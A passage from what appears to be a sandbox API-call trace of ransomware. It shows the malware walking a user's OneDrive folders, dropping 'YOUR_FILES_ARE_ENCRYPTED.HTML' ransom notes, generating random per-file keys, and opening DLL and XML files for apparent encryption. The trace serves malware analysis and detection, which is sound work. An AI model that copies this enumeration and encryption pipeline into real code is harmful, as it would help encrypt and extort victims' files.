lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.428] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.428] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.428] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.428] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.428] lstrlenW (lpString=".mui") returned 4 [0160.428] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.429] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.429] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.429] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\es\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.429] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.432] CloseHandle (hObject=0x5a8) returned 1 [0160.432] GetProcessHeap () returned 0x270000 [0160.433] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.433] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="et", cAlternateFileName="")) returned 1 [0160.433] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et") returned 74 [0160.433] GetProcessHeap () returned 0x270000 [0160.433] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.433] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et" [0160.433] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\*" [0160.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.435] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa84c9570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.435] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.435] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.435] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.435] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.435] lstrlenW (lpString=".mui") returned 4 [0160.435] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.435] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa872ab70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa872ab70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.435] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.435] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\et\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\et\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.436] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.438] CloseHandle (hObject=0x5a8) returned 1 [0160.439] GetProcessHeap () returned 0x270000 [0160.439] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.439] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e90c70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e90c70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x70a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="ETWlog.dll", cAlternateFileName="")) returned 1 [0160.440] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll") returned 82 [0160.440] lstrcmpW (lpString1="ETWlog.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.440] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0160.440] lstrlenW (lpString=".dll") returned 4 [0160.440] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0160.440] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\etwlog.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0160.440] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=28840) returned 1 [0160.440] GetProcessHeap () returned 0x270000 [0160.440] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0160.441] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="04") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="98") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="AA") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="29") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="D7") returned 2 [0160.441] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="46") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="05") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="59") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="A0") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="AE") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="54") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="91") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="BF") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="F5") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="C4") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="82") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="57") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="2C") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="81") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="40") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="0B") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="61") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="E0") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="F9") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="68") returned 2 [0160.442] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="5F") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="7B") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="54") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="30") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="25") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="C6") returned 2 [0160.443] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="3E") returned 2 [0160.444] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ETWlog.dll" [0160.444] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.444] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0160.444] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="eu", cAlternateFileName="")) returned 1 [0160.444] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu") returned 74 [0160.444] GetProcessHeap () returned 0x270000 [0160.444] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.444] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu" [0160.444] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\*" [0160.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfedb8e25, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.446] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa872ab70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfedb8e25, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0160.446] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0xfedb8e25, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.446] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.446] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.446] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.446] lstrlenW (lpString=".mui") returned 4 [0160.446] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.446] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0xfedb8e25, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.446] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.446] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\eu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\eu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0160.447] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.449] CloseHandle (hObject=0x590) returned 1 [0160.450] GetProcessHeap () returned 0x270000 [0160.450] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.450] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3f03090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3f03090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3f03090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x4e5f, dwReserved0=0x0, dwReserved1=0x60, cFileName="ExclusionList.xml", cAlternateFileName="EXCLUS~1.XML")) returned 1 [0160.451] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml") returned 89 [0160.451] lstrcmpW (lpString1="ExclusionList.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.451] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0160.451] lstrlenW (lpString=".xml") returned 4 [0160.451] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0160.451] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\exclusionlist.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0160.452] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=20063) returned 1 [0160.452] GetProcessHeap () returned 0x270000 [0160.452] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0160.457] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="28") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="CA") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="73") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="44") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="56") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="8C") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="01") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="DE") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="04") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="1C") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="36") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="9B") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F0") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="CC") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="A2") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="16") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="51") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="B2") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="2F") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="83") returned 2 [0160.458] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="38") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="94") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="17") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="70") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="47") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="40") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="50") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="D7") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="FD") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="CC") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="55") returned 2 [0160.459] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="46") returned 2 [0160.460] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml") 